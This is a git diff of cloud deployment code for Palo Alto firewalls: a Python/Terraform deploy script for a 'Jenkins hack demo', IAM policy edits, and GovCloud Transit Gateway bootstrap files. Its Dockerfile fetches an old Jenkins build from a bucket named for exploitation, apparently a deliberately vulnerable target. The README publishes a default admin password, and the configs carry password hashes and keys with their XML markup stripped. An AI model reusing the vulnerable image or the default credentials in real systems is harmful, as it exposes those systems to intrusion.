to firewall") +# try: +# response = urllib.request.urlopen(cmd, data=None, context=gcontext, timeout=5).read() +# +# except urllib.error.URLError: +# logger.debug("No response from FW. So maybe not up!") +# return 'no' +# # sleep and check again? +# else: +# logger.debug("Got response to 'show chassis status' {}".format(response)) +# +# resp_header = ET.fromstring(response) +# logger.debug('Response header is {}'.format(resp_header)) +# +# if resp_header.tag != 'response': +# logger.debug("Did not get a valid 'response' string...maybe a timeout") +# return 'cmd_error' +# +# if resp_header.attrib['status'] == 'error': +# logger.debug("Got an error for the command") +# return 'cmd_error' +# +# if resp_header.attrib['status'] == 'success': +# # The fw responded with a successful command execution. So is it ready? +# for element in resp_header: +# if element.text.rstrip() == 'yes': +# logger.info("FW Chassis is ready to accept configuration and connections") +# return 'yes' +# else: +# logger.info("FW Chassis not ready, still waiting for dataplane") +# time.sleep(10) +# return 'almost' + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + global gcontext + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 15 + while True: + if count < max_count: + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_bucket): + username = username + password = password + aws_access_key = aws_access_key + aws_secret_key = aws_secret_key + aws_region = aws_region + ec2_key_pair = ec2_key_pair + albDns = '' + nlbDns = '' + fwMgt = '' + + default_vars = { + 'aws_access_key': aws_access_key, + 'aws_secret_key': aws_secret_key, + 'aws_region': aws_region + } + + WebInDeploy_vars = { + 'aws_access_key': aws_access_key, + 'aws_secret_key': aws_secret_key, + 'aws_region': aws_region, + 'ServerKeyName': ec2_key_pair, + 'bootstrap_s3bucket': bootstrap_bucket + } + + waf_conf_vars = { + 'aws_access_key': aws_access_key, + 'aws_secret_key': aws_secret_key, + 'aws_region': aws_region, + 'ServerKeyName': ec2_key_pair, + 'alb_arn': albDns, + 'nlb-dns': nlbDns + } + + WebInFWConf_vars = { + 'aws_access_key': aws_access_key, + 'aws_secret_key': aws_secret_key, + 'aws_region': aws_region, + 'ServerKeyName': ec2_key_pair, + 'mgt-ipaddress-fw1': fwMgt, + 'nlb-dns': nlbDns, + 'username': username, + 'password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + start_time = time.asctime() + print(f'Starting Deployment at {start_time}\n') + + # Build Infrastructure + + tf = Terraform(working_dir='./WebInDeploy') + + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False, var=WebInDeploy_vars) + + return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, + **kwargs) + + web_in_deploy_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + # update_status('web_in_deploy_stdout', stdout) + update_status('web_in_deploy_output', web_in_deploy_output) + + if return_code1 != 0: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + update_status('web_in_deploy_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_deploy_status', 'success') + + albDns = tf.output('ALB-DNS') + fwMgt = tf.output('MGT-IP-FW-1') + nlbDns = tf.output('NLB-DNS') + fwMgtIP = fwMgt + + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + WebInFWConf_vars['nlb-dns'] = nlbDns + + WebInDeploy_vars['alb_dns'] = albDns + WebInDeploy_vars['nlb-dns'] = nlbDns + + # + # Apply WAF Rules + # + + tf = Terraform(working_dir='./waf_conf') + tf.cmd('init') + kwargs = {"auto-approve": True} + logger.info("Applying WAF config to App LB") + + if run_plan: + tf.plan(capture_output=capture_output, var=vars, **kwargs) + + return_code3, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, + var=waf_conf_vars, **kwargs) + + waf_conf_out = tf.output() + + update_status('waf_conf_output', waf_conf_out) + # update_status('waf_conf_stdout', stdout) + # update_status('waf_conf_stderr', stderr) + + logger.debug('Got Return code to deploy waf_conf {}'.format(return_code3)) + + if return_code3 != 0: + logger.info("waf_conf failed") + update_status('waf_conf_status', 'error') + update_status('waf_conf_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('waf_conf_status', 'success') + + logger.info("Got these values from output of first run\n\n") + logger.info("ALB address is {}".format(albDns)) + logger.info("nlb address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + # + # Check firewall is up and running + # # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + logger.info("Updating firewall with latest content pack") + + update_fw(fwMgtIP, api_key) + updateHandle = updater.ContentUpdater(fw) + + # updateHandle.download(fw) + # logger.info("Waiting 3 minutes for content update to download") + # time.sleep(210) + # updateHandle.install() + + # + # Configure Firewall + # + + tf = Terraform(working_dir='./WebInFWConf') + tf.cmd('init') + kwargs = {"auto-approve": True} + + logger.info("Applying addtional config to firewall") + + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + + if run_plan: + tf.plan(capture_output=capture_output, var=WebInFWConf_vars) + + # update initial vars with generated fwMgt ip + + return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, + var=WebInFWConf_vars, **kwargs) + + web_in_fw_conf_out = tf.output() + + update_status('web_in_fw_conf_output', web_in_fw_conf_out) + # update_status('web_in_fw_conf_stdout', stdout) + + logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) + + if return_code2 != 0: + logger.error("WebFWConfy failed") + update_status('web_in_fw_conf_status', 'error') + update_status('web_in_fw_conf_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_fw_conf_status', 'success') + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + # FIXME - add outputs for all 3 dirs + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-k', '--aws_access_key', help='AWS Key', required=True) + parser.add_argument('-s', '--aws_secret_key', help='AWS Secret', required=True) + parser.add_argument('-r', '--aws_region', help='AWS Region', required=True) + parser.add_argument('-c', '--aws_key_pair', help='AWS EC2 Key Pair', required=True) + parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + aws_access_key = args.aws_access_key + aws_secret_key = args.aws_secret_key + aws_region = args.aws_region + ec2_key_pair = args.aws_key_pair + bootstrap_s3bucket = args.s3_bootstrap_bucket + + main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_s3bucket) diff --git a/aws/Jenkins_proj-master/destroy.py b/aws/Jenkins_proj-master/destroy.py index 0767fe20..5cc63f13 100644 --- a/aws/Jenkins_proj-master/destroy.py +++ b/aws/Jenkins_proj-master/destroy.py @@ -1,9 +1,20 @@ #!/usr/bin/env python3 """ -Paloaltonetworks Deploy_Jenkins_Hack_Demo.py - -This software is provided without support, warranty, or guarantee. -Use at your own risk. +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com """ ''' @@ -68,7 +79,7 @@ def main(aws_access_key, aws_secret_key, aws_region): exit() else: - logger.info("Destroyed WebInDeploy ") + logger.info("Destroyed waf_conf Successfully") tf = Terraform(working_dir='./WebInDeploy') tf.cmd('init') @@ -82,12 +93,12 @@ def main(aws_access_key, aws_secret_key, aws_region): if return_code1 != 0: logger.info("WebInDeploy destroyed") - deployment_status = {'WebInDeploy': 'Fail'} - print(deployment_status) + print ('Failed to Destroy WebInDeploy') + exit(1) else: - deployment_status = {'WebInDeploy': 'Success'} - print(deployment_status) + print ('Destroyed WebInDeploy Successfully') + exit(0) diff --git a/aws/Jenkins_proj-master/jenkins/Dockerfile b/aws/Jenkins_proj-master/jenkins/Dockerfile index af9e7988..54ce0aef 100644 --- a/aws/Jenkins_proj-master/jenkins/Dockerfile +++ b/aws/Jenkins_proj-master/jenkins/Dockerfile @@ -21,7 +21,7 @@ ENV JENKINS_VERSION 2.32.1 RUN set -ex \ && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \ && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \ - && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \ + && wget https://jfexploit1.s3-us-west-2.amazonaws.com/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \ && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref EXPOSE 8080 diff --git a/aws/Jenkins_proj-master/requirements.txt b/aws/Jenkins_proj-master/requirements.txt index 54a21127..87044590 100644 --- a/aws/Jenkins_proj-master/requirements.txt +++ b/aws/Jenkins_proj-master/requirements.txt @@ -1,4 +1,10 @@ +certifi==2019.3.9 +chardet==3.0.4 +collections2==0.3.0 +idna==2.8 pan-python==0.14.0 pandevice==0.6.6 python-terraform==0.10.0 requests==2.21.0 +urllib3==1.24.2 +xmltodict==0.12.0 diff --git a/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json b/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json index 8979a064..a0daa20d 100644 --- a/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json +++ b/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json @@ -2,46 +2,24 @@ "Version": "2012-10-17", "Statement": [ { - "Action": [ - "acm:List*", - "apigateway:GET", - "appstream:Describe*", - "cloudtrail:GetEventSelectors", - "cloudtrail:LookupEvents", - "cloudsearch:Describe*", - "dynamodb:DescribeTable", - "ds:Describe*", - "elasticache:List*", - "eks:List*", - "eks:Describe*", - "elasticfilesystem:Describe*", - "elasticmapreduce:Describe*", - "elasticmapreduce:List*", - "inspector:Describe*", - "inspector:List*", - "glacier:List*", - "glacier:Get*", - "guardduty:List*", - "guardduty:Get*", - "iam:SimulatePrincipalPolicy", - "iam:SimulateCustomPolicy", - "kinesis:Describe*", - "kinesis:List*", - "rds:ListTagsForResource", - "sns:List*", - "sns:Get*", - "sqs:SendMessage", - "logs:FilterLogEvents", - "logs:Get*", - "logs:Describe*", - "secretsmanager:List*", - "secretsmanager:Describe*", - "lambda:List*", - "s3:GetAccountPublicAccessBlock", - "s3:GetBucketPublicAccessBlock" - ], + "Action": [ + "apigateway:GET", + "cognito-identity:ListTagsForResource", + "cognito-idp:ListTagsForResource", + "elasticbeanstalk:ListTagsForResource", + "elasticfilesystem:DescribeTags", + "glacier:GetVaultLock", + "glacier:ListTagsForVault", + "logs:GetLogEvents", + "secretsmanager:DescribeSecret", + "ssm:GetParameters", + "ssm:ListTagsForResource", + "sqs:SendMessage", + "elasticmapreduce:ListSecurityConfigurations", + "sns:listSubscriptions" + ], "Effect": "Allow", "Resource": "*" } ] - } \ No newline at end of file + } diff --git a/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json b/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json index 4d9ea73e..a0daa20d 100644 --- a/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json +++ b/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json @@ -2,46 +2,24 @@ "Version": "2012-10-17", "Statement": [ { - "Action": [ - "acm:List*", - "apigateway:GET", - "appstream:Describe*", - "cloudtrail:GetEventSelectors", - "cloudtrail:LookupEvents", - "cloudsearch:Describe*", - "dynamodb:DescribeTable", - "ds:Describe*", - "elasticache:List*", - "eks:List*", - "eks:Describe*", - "elasticfilesystem:Describe*", - "elasticmapreduce:Describe*", - "elasticmapreduce:List*", - "inspector:Describe*", - "inspector:List*", - "glacier:List*", - "glacier:Get*", - "guardduty:List*", - "guardduty:Get*", - "iam:SimulatePrincipalPolicy", - "iam:SimulateCustomPolicy", - "kinesis:Describe*", - "kinesis:List*", - "rds:ListTagsForResource", - "sns:List*", - "sns:Get*", - "sqs:SendMessage", - "logs:FilterLogEvents", - "logs:Get*", - "logs:Describe*", - "secretsmanager:List*", - "secretsmanager:Describe*", - "lambda:List*", - "s3:GetAccountPublicAccessBlock", - "s3:GetBucketPublicAccessBlock" - ], + "Action": [ + "apigateway:GET", + "cognito-identity:ListTagsForResource", + "cognito-idp:ListTagsForResource", + "elasticbeanstalk:ListTagsForResource", + "elasticfilesystem:DescribeTags", + "glacier:GetVaultLock", + "glacier:ListTagsForVault", + "logs:GetLogEvents", + "secretsmanager:DescribeSecret", + "ssm:GetParameters", + "ssm:ListTagsForResource", + "sqs:SendMessage", + "elasticmapreduce:ListSecurityConfigurations", + "sns:listSubscriptions" + ], "Effect": "Allow", "Resource": "*" } ] - } \ No newline at end of file + } diff --git a/aws/TGW-VPC-GovCloud/README.md b/aws/TGW-VPC-GovCloud/README.md new file mode 100644 index 00000000..6da38651 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/README.md @@ -0,0 +1,50 @@ +# Transit Gateway Deployment for North/South and East/West Inspection +# The GovCloud Version + +This build is a port of existing work to AWS GovCloud. The original may be found here: + +https://github.com/wwce/terraform/tree/master/aws/TGW-VPC + +This terraform template will deploy a complete Transit Gateway(TGW) solution with Palo Alto Networks VM-Series Firewalls to inspect both N/S and E/W traffic. The follow diagram shows what will be deployed: + +![tgw-vpc](https://user-images.githubusercontent.com/21991161/53307956-ff23d680-3862-11e9-9fd1-49cbacb696ea.jpg) + + + This is a quick overview of what components are deployed +``` +1. Security VPC that includes 2 firewalls in seperate AZs. +2. The template will create 2 S3 buckets used for bootstrapping the firewall configuration. Do not create the S3 buckets manually. +3. Two Spoke VPCs. Each with two subnets and 1 ubuntu server deployed in it. +4. TGW with attachments and routing to support N/S and E/W traffic through the firewalls. +``` + + NOTE: + ``` + 1. There are some things that should be changed in the Variables.tf file. They are labeled at the top of the file. + 2. This assumes that the AWS CLI is installed on the machine doing the deploymnet + 3. Here is a link to setting up a creds file to access AWS: + https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html + 4. After deployment the firewall username and password are: + Username: admin + Password: Pal0Alt0@123 + 5. us-gov-west was used for deployment testing. It should work in other regions provided all underlying features are available. + + ``` + + This is a screenshot of the output once the deployment has completed that shows how to connect to the various components: + +![tgwout](https://user-images.githubusercontent.com/21991161/53307965-1793f100-3863-11e9-8eaa-fabeb35d7cda.jpg) + + + # Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. + + # License + + + Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. diff --git a/aws/TGW-VPC-GovCloud/bootstrap.tf b/aws/TGW-VPC-GovCloud/bootstrap.tf new file mode 100644 index 00000000..a671bd2b --- /dev/null +++ b/aws/TGW-VPC-GovCloud/bootstrap.tf @@ -0,0 +1,97 @@ +# Create a BootStrap S3 Bucket + +resource "aws_s3_bucket" "bootstrap_bucket" { + bucket = "${var.bootstrap_s3bucket}" + acl = "private" + force_destroy = true + + tags { + Name = "bootstrap_bucket" + } +} + +# Create Folders and Upload Bootstrap Files +resource "aws_s3_bucket_object" "bootstrap_xml" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "license/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "content" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + +/* Roles, ACLs, Permissions, etc... */ + +resource "aws_iam_role" "bootstrap_role" { + name = "ngfw_bootstrap_role" + + assume_role_policy = < + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.101.1 + + + None + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + FW-1 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + any + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + ethernet1/1 + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.1.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.2.45 + + + + + + + ethernet1/2 + + + + + trust + + + trust + + + 10.0.0.0/8 + + + 10.0.0.0/8 + + any + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + + + + + + diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt b/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..6ad1fb1b --- /dev/null +++ b/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-1 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml b/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml new file mode 100644 index 00000000..13369f72 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml @@ -0,0 +1,871 @@ + + + + + + $1$frspqxow$mYHgnubHD/BO9DTqIU8eP. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$aljwjsru$ZIQ1DURHk0wBmwWTajdFu/ + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 